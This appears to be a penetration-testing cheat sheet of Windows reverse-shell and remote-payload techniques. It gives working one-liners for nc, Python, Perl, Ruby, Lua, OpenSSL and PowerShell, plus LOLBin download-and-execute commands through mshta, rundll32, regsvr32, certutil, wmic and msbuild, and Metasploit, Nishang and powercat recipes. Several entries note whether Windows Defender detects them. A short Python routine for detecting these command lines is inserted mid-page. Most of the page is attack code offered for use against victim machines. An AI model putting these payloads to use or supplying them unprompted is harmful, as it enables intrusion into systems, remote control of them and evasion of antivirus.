# Shells - Windows
## Lolbas
The page [lolbas-project.github.io](https://lolbas-project.github.io/) is for Windows what [https://gtfobins.github.io/](https://gtfobins.github.io/) is for Linux.\
Obviously, **there are no SUID files or sudo privileges on Windows**, but it is useful to know **how** some **binaries** can be (ab)used to perform unexpected actions such as **executing arbitrary code.**
## NC
```
nc.exe -e cmd.exe <Attacker_IP> <PORT>
```
## SBD
**[sbd](https://www.kali.org/tools/sbd/) is a portable and secure Netcat alternative**. It works on Unix-like systems and Win32. With features such as strong encryption, program execution, customizable source ports and continuous reconnection, sbd offers a versatile solution for TCP/IP communication. For Windows users, the sbd.exe build from the Kali Linux distribution can be used as a reliable Netcat replacement.
```
# Victim's machine
sbd -l -p 4444 -e bash -v -n
listening on port 4444

# Attacker's machine
sbd 4444
uid=0(root) gid=0(root) groups=0(root)
```
## Python
```
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
```
## Perl
Perl is a high-level, general-purpose programming language that is commonly used for scripting and system administration tasks. It is known for its powerful text processing capabilities and is often used for creating shell scripts on Windows systems. Perl scripts can be executed on Windows using the Perl interpreter, which needs to be installed on the system.
```
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```
## Ruby
```
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
```
## Lua
```
lua5.1 -e 'local host, port = "", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
```
## OpenSSL
Attacker (Kali)
```
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here you will be able to get the response
```
Victim
```
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
```
## Powershell
```
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('')|iex"
powershell "IEX(New-Object Net.WebClient).downloadString('')"
Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('')"
echo IEX(New-Object Net.WebClient).DownloadString('') | powershell -noprofile
```
Process performing the network call: **powershell.exe**\
Payload written to disk: **NO** (_at least nowhere I could find using procmon!_)
```
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
```
Process performing the network call: **svchost.exe**\
Payload written to disk: **WebDAV client local cache**
**One-liner:**
```
$client = New-Object System.Net.Sockets.TCPClient("",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
**Get more information about different PowerShell shells at the end of this document**
## Mshta
* [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
mshta http://webserver/payload.hta
mshta \\webdavserver\folder\payload.hta
```
#### **hta-psh reverse shell example (use hta to download and execute a PS backdoor)**
```
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('')"</scRipt>
```
**You can very easily download and execute a Koadic zombie using the hta stager**
#### hta example
```
<script language="jscript">
var c = "cmd.exe /c calc.exe";
new ActiveXObject('WScript.Shell').Run(c);
```
#### **mshta - sct**
```
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:C:\local\path\scriptlet.sct"")")) -->
<script language="JScript">
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
```
#### **Mshta - Metasploit**
```
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost
msf exploit(windows/misc/hta_server) > set lhost
msf exploit(windows/misc/hta_server) > exploit
Victim> mshta.exe // #The file name is given in the output of metasploit
```
**Detected by Defender**
## **Rundll32**
[**Hello world DLL example**](https://github.com/carterjones/hello-world-dll)
* [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```
rundll32 \\webdavserver\folder\payload.dll,entrypoint
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
```
**Detected by Defender**
**Rundll32 - sct**
```
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<script language="JScript">
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
```
#### **Rundll32 - Metasploit**
```
use windows/smb/smb_delivery
#You will be given the command to run in the victim: rundll32.exe \\\Iwvc\test.dll,0
```
**Rundll32 - Koadic**
```
use stager/js/rundll32_js
set ENDPOINT sales
#Koadic will tell you what you need to execute inside the victim, it will be something like:
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","",false);x.send();eval(x.responseText);window.close();
```
## Regsvr32
* [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
```
**Detected by Defender**
#### Regsvr32 - sct
```
<?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
```
#### **Regsvr32 - Metasploit**
```
use multi/script/web_delivery
set target 3
set payload windows/meterpreter/reverse/tcp
set lhost
#You will be given the command to run in the victim: regsvr32 /s /n /u /i: scrobj.dll
```
**You can easily download and execute a Koadic zombie using the regsvr stager**
## Certutil
* [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
Download a base64-encoded DLL, decode it and execute it.
```
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
```
Download a base64-encoded EXE, decode it and execute it.
```
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
```
**Detected by Defender**
## **Cscript/Wscript**
```
powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""
```
**Cscript - Metasploit**
```
msfvenom -p cmd/windows/reverse_powershell lhost= lport=4444 -f vbs > shell.vbs
```
**Detected by Defender**
## PS-Bat
Process performing the network call: **svchost.exe**\
Payload written to disk: **WebDAV client local cache**
```
msfvenom -p cmd/windows/reverse_powershell lhost= lport=4444 > shell.bat
impacket-smbserver -smb2support kali `pwd`
```
**Detected by Defender**
## **MSIExec**
```
msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=1234 -f msi > shell.msi
python -m SimpleHTTPServer 80
victim> msiexec /quiet /i \\\kali\shell.msi
```
## **Wmic**
* [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```
wmic os get /format:"https://webserver/payload.xsl"
```
Example xsl file [from here](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7):
```
<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('') | powershell -noprofile -");
```
**Not detected**
**You can very easily download and execute a Koadic zombie using the wmic stager**
## Msbuild
* [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
```
This technique can be used to bypass Application Whitelisting and Powershell.exe restrictions. As a result, you will be prompted with a PS shell.\
Just download and execute the following: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
```
**Not detected**
## **CSC**
Compile C# code on the victim machine.
```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs
```
You can download a basic C# reverse shell here: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)
**Not detected**
## **Regasm/Regsvc**
* [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
```
**I haven't tried it**
## Odbcconf
* [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
```
**I haven't tried it**
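A defender-side counterpart to the LOLBin one-liners catalogued in the sections above (Mshta, Rundll32, Regsvr32, Certutil, Wmic, Msbuild and the PowerShell download cradles): a small Python triage routine, added here as an example and not part of the original page, that matches process-creation command lines against the remote-script and remote-DLL patterns those sections show. The events, rule names and the `http://webserver` / `\\webdavserver` hosts are constructed placeholders.

```python
import re

# Constructed sample process-creation events (image name, command line), modelled
# on the one-liners in the sections above. Not real telemetry; hosts are placeholders.
SAMPLE_EVENTS = [
    ("mshta.exe", 'mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))'),
    ("regsvr32.exe", "regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll"),
    ("rundll32.exe", r"rundll32 \\webdavserver\folder\payload.dll,entrypoint"),
    ("certutil.exe", "certutil -urlcache -split -f http://webserver/payload.b64 payload.b64"),
    ("wmic.exe", 'wmic os get /format:"https://webserver/payload.xsl"'),
    ("msbuild.exe", r"MSBuild.exe /noautoresponse /preprocess \\webdavserver\folder\payload.xml"),
    ("powershell.exe", "powershell -exec bypass -c \"iwr('http://webserver/shell.ps1')|iex\""),
    ("regsvr32.exe", r"regsvr32 /s C:\Program Files\Vendor\component.dll"),  # benign
    ("certutil.exe", "certutil -verify cert.cer"),                           # benign
]

# A "remote" source is a URL scheme or a UNC path such as \\webdavserver\folder.
# For the UNC variants the page notes that svchost.exe (WebClient), not the LOLBin,
# makes the network call, so the command line is the artifact worth inspecting.
REMOTE = r"(?:https?:|\\\\[^\\\s]+\\)"

# (rule name, image the rule applies to, pattern over the command line)
RULES = [
    ("mshta_remote_script", "mshta.exe", re.compile(r"vbscript:|javascript:|" + REMOTE + r"\S*\.(?:hta|sct)", re.I)),
    ("regsvr32_scrobj", "regsvr32.exe", re.compile(r"/i:\S*" + REMOTE + r".*scrobj\.dll", re.I)),
    ("rundll32_remote", "rundll32.exe", re.compile(r"javascript:|" + REMOTE + r"\S*\.dll", re.I)),
    ("certutil_download", "certutil.exe", re.compile(r"-urlcache\b.*\s-f\s+https?://", re.I)),
    ("wmic_remote_xsl", "wmic.exe", re.compile(r"/format:\S*" + REMOTE, re.I)),
    ("msbuild_remote_project", "msbuild.exe", re.compile(REMOTE + r"\S*\.(?:xml|csproj)", re.I)),
    ("powershell_download_cradle", "powershell.exe",
     re.compile(r"(?:DownloadString|DownloadFile|iwr|Invoke-WebRequest)\b.*\biex\b", re.I)),
]


def match_rules(image, cmdline):
    """Return the names of the rules that fire for one process-creation event."""
    image = image.lower()
    return [name for name, img, rx in RULES if image == img and rx.search(cmdline)]


def triage(events):
    """Return only the events that produced findings, together with their rule names."""
    return [(img, cmd, hits) for img, cmd in events if (hits := match_rules(img, cmd))]


if __name__ == "__main__":
    for img, cmd, hits in triage(SAMPLE_EVENTS):
        print(f"{img:16} {', '.join(hits):28} {cmd}")
```

The two benign events (a local `regsvr32 /s` registration and `certutil -verify`) produce no findings, which is the false-positive check a rule set like this needs before it is wired into real telemetry.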
## PowerShell Shells
### PS-Nishang
In the **Shells** folder there are many different shells. To download and execute _Invoke-PowerShellTcp.ps1_, make a copy of the script and append to the end of the file:
```
Invoke-PowerShellTcp -Reverse -IPAddress -Port 4444
```
Start serving the script on a web server and execute it on the victim's end:
```
powershell -exec bypass -c "iwr('')|iex"
```
Defender does not yet detect it as malicious code (as of 3/04/2019).
**TODO: Check other nishang shells**
### **PS-Powercat**
Download it, start a web server, start the listener, and execute on the victim's end:
```
powershell -exec bypass -c "iwr('')|iex;powercat -c -p 4444 -e cmd"
```
Defender does not yet detect it as malicious code (still, as of 3/04/2019).
**Other options offered by powercat:**
Bind shells, reverse shells (TCP, UDP, DNS), port redirection, upload/download, payload generation, file serving...
```
Serve a cmd Shell:
powercat -l -p 443 -e cmd
Send a cmd Shell:
powercat -c -p 443 -e cmd
Send a powershell:
powercat -c -p 443 -ep
Send a powershell UDP:
powercat -c -p 443 -ep -u
TCP Listener to TCP Client Relay:
powercat -l -p 8000 -r tcp:
Generate a reverse tcp payload which connects back to port 443:
powercat -c -p 443 -e cmd -g
Start A Persistent Server That Serves a File:
powercat -l -p 443 -i C:\inputfile -rep
```
### Empire
Create a powershell launcher, save it to a file, then download and execute it.
```
powershell -exec bypass -c "iwr('')|iex;powercat -c -p 4444 -e cmd"
```
**Detected as malicious code**
### MSF-Unicorn
Create a powershell version of a metasploit backdoor using unicorn
```
python unicorn.py windows/meterpreter/reverse_https 443
```
Start msfconsole with the created resource file:
```
msfconsole -r unicorn.rc
```
Start a web server serving the file _powershell\_attack.txt_ and execute on the target:
```
powershell -exec bypass -c "iwr('')|iex"
```
**Detected as malicious code**
## More
[PS>Attack](https://github.com/jaredhaight/PSAttack) PS console with some offensive PS modules preloaded (encrypted)\
[WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive PS modules and proxy detection (IEX)
## References
* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
* [https://gist.github.com/Arno0x](https://gist.github.com/Arno0x)
* [https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT)
* [https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/](https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/)
* [https://www.hackingarticles.in/koadic-com-command-control-framework/](https://www.hackingarticles.in/koadic-com-command-control-framework/)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
* [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
